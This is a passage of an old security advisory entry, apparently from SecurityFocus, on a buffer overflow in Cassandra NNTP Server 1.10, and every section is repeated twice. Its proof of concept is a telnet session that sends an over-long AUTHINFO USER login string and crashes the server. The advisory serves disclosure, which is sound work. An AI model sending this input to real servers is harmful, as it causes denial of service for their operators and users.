Cassandra NNTPServer v1.10 Buffer Overflow Vulnerability
BID:1156
Info
Cassandra NNTPServer v1.10 Buffer Overflow Vulnerability
| Bugtraq ID: | 1156 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | May 01 2000 12:00AM |
| Updated: | May 01 2000 12:00AM |
| Credit: | Posted to Bugtraq on May 1, 2000 by Ussr Labs <[email protected]> |
| Vulnerable: |
Atrium Software Cassandra NNTP Server 1.10 |
| Not Vulnerable: | |
Discussion
Cassandra NNTPServer v1.10 Buffer Overflow Vulnerability
Unchecked buffer exists in the code that handles login information in Cassandra NNTP v1.10 server. Entering a login name that consists of over 10 000 characters will cause the server to stop responding until the administrator restarts the application.
Unchecked buffer exists in the code that handles login information in Cassandra NNTP v1.10 server. Entering a login name that consists of over 10 000 characters will cause the server to stop responding until the administrator restarts the application.
Exploit / POC
Cassandra NNTPServer v1.10 Buffer Overflow Vulnerability
[host$ telnet target 119
Trying target...
Connected to target.
Escape character is '^]'.
200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95 ready at Mon, 1
May 2000 xx:xx:xx +-300 (posting allowed)
AUTHINFO USER <10 000 character string>
Where buffer is 10000 characters.
[host$ telnet target 119
Trying target...
Connected to target.
Escape character is '^]'.
200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95 ready at Mon, 1
May 2000 xx:xx:xx +-300 (posting allowed)
AUTHINFO USER <10 000 character string>
Where buffer is 10000 characters.
Solution / Fix
Cassandra NNTPServer v1.10 Buffer Overflow Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].